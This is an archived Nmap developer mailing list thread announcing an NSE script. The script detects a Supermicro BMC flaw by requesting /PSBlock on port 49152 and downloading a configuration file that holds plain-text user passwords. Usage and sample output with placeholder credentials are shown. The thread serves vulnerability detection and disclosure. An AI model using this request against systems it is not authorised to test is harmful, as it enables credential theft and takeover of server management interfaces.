Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: NSE: bmc-supermicro-conf. Attempts to download conf file from vulnerable Supermicro BMC products

From: Paulino Calderon <paulino () calderonpale com>
Date: Sun, 17 Aug 2014 21:18:39 -0500
Hi everyone,

I committed this in r33546 and r33547. The vulnerability got nominated for a Pwnie for Best Server-Side Bug at BH this 
year and apparently there are still a lot of exposed servers.

Cheers.

On Jun 20, 2014, at 4:47 AM, Paulino Calderon <paulino () calderonpale com> wrote:


Hi list,

I’m attaching a NSE script to detect a serious flaw affecting Supermicro BMCs. It seems the offsets change between 
products and versions so I left the credential parser out for now. 

Cheers.

Download script: 
https://bitbucket.org/cldrn/nmap-nse-scripts/raw/aa043e48b5526253217208d20a8c61c5c967014b/scripts/6.x/bmc-supermicro-conf.nse

description = [[
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable 
Supermicro BMC products.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file 
contains all 
users with their passwords in plain text form.

References:
* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
]]

---
-- @usage nmap -p49152 --script bmc-supermicro-conf <target>
-- 
-- @output
-- PORT      STATE SERVICE REASON
-- 49152/tcp open  unknown syn-ack
-- | bmc-supermicro-conf: 
-- |   VULNERABLE:
-- |   Supermicro BMC configuration file disclosure
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some Supermicro BMC products are vulnerable to an authentication bypass vulnerability that allows 
attackers to download
-- |        a configuration file containing plain text user credentials. This credentials may be used to log in to 
the administrative interface and the 
-- |       network's Active Directory.
-- |     Disclosure date: 2014-06-19
-- |     Extra information:
-- |       Snippet from configuration file:
-- |   
.............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
-- |   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
-- |   
-- |     References:
-- |_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
--
-- @args bmc-supermicro-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
---
<bmc-supermicro-conf.nse>


_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: